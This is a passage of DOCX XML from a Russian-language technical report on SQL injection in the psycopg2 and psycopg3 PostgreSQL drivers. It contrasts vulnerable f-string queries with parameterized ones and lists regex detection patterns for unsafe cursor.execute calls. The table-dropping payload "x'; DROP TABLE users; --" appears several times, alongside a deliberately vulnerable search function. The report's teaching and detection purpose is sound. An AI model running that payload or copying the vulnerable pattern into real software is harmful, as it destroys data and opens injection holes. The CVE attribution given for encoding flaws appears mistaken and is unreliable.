      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT id, email FROM users WHERE name = 'x'; DROP TABLE users; --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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 парсит строку как три statement-а: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комментарий. Все три исполняются по очереди,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коммитится в autocommit-режиме. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">fetchall()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> вернёт результат последней команды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 пустой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cursor.description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), приложение получит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ProgrammingError: no results to fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — но таблица уже удалена.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сервер видит (безопасный код):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT id, email FROM users WHERE name = 'x''; DROP TABLE users; --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">adapt()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> экранировал внутренние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весь payload остался внутри литерала. PostgreSQL парсит это как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">один</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement с буквальным значением </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">x'; DROP TABLE users; --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в WHERE. Стакинга нет.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что отличает psycopg2 от драйверов с extended-protocol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Защита НЕ опирается на отказ сервера от мульти-команд — сервер их по-прежнему примет, если строка экранирована неправильно.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Исторически уязвимости появлялись при работе с не-UTF8 кодировками клиента (CVE-2022-1552 для PG, не для psycopg2, но эксплуатация шла через драйвер) и при использовании самописных адаптеров без вызова </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">adapt()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cursor.executemany()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> строит одну SQL-строку с множеством VALUES — те же правила экранирования.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Динамические идентификаторы (имена таблиц/колонок) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">adapt()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> НЕ покрывает — для них есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psycopg2.sql.SQL().format(Identifier(...))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Конкатенация имени таблицы через f-string в простой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уязвима даже с params для значений.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigations специфичные для драйвера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Всегда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cursor.execute(sql, params)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, никогда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cursor.execute(f"…{var}…")</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 var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динамических identifiers — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psycopg2.sql.SQL("SELECT * FROM {}").format(sql.Identifier(table_name))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Перевод на psycopg3 (см. 3.5.2) даёт настоящий extended-protocol — это второй слой защиты, независимый от корректности экранирования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коде судьи (rules.py) ловить: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cursor.execute\(f"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cursor.execute\([^,]*\+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cursor.execute\(".*%\s*\w+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text\(f"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Версии</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">psycopg2 ≥ 2.0 (вся история ветки) — поведение одинаковое. psycopg2-binary — то же самое, отличия только в сборке. Для перехода на extended-protocol нужен psycopg3.</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psycopg2 docs: «Passing parameters to SQL queries» — https://www.psycopg.org/docs/usage.html#passing-parameters-to-sql-queries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psycopg2 docs: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psycopg2.sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для безопасной композиции SQL — https://www.psycopg.org/docs/sql.html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libpq docs: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PQexecParams</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — https://www.postgresql.org/docs/current/libpq-exec.html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R20 (sources/research.md)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5.2 psycopg3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> psycopg3 (актуальная ветка 3.2.x) — переписанный с нуля драйвер, основан на libpq, но поддерживает оба протокола wire. Логика выбора: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.execute(sql, params)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">extended protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Parse/Bind/Execute), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.execute(sql)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без params → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">server-side bindings, но multi-statement поддерживаются через text path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (результаты доступны через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cursor.nextset()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Cursor.results()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Также есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">prepare_threshold</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (по умолчанию 5) — после стольких исполнений запрос автоматически становится server-side prepared statement.</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import psycopg</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conn = psycopg.connect(dsn)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cur = conn.cursor()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search_users(name: str):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(f"SELECT id, email FROM users WHERE name = '{name}'")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return cur.fetchall()</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в f-string. Параметры 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не передаются — psycopg3 уходит через text-path, который пропускает multi-statement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Безопасный код.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">def search_users(name: str):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute("SELECT id, email FROM users WHERE name = %s", (name,))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return cur.fetchall()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Параметр передан вторым аргументом — psycopg3 формирует Parse-сообщение с одной командой и Bind-сообщение со значением. Значение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едет в отдельном сообщении wire, не смешивается с SQL-токенами на стороне клиента вообще.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Единый payload, два пути:</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100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">x'; DROP TABLE users; --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Путь 1: simple/text-path (уязвимый код, без params).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="14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SELECT id, email FROM users WHERE name = 'x'; DROP TABLE users; --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL парсит как два statement-а, оба исполняются. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.fetchall()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> вернёт результат первого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(psycopg3 в отличие от psycopg2 сохраняет каждый result в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nextset()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-цепочке — оба доступны).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Путь 2: extended (безопасный код, с params).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сервер отвечает (на этапе Parse, до Bind/Execute):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
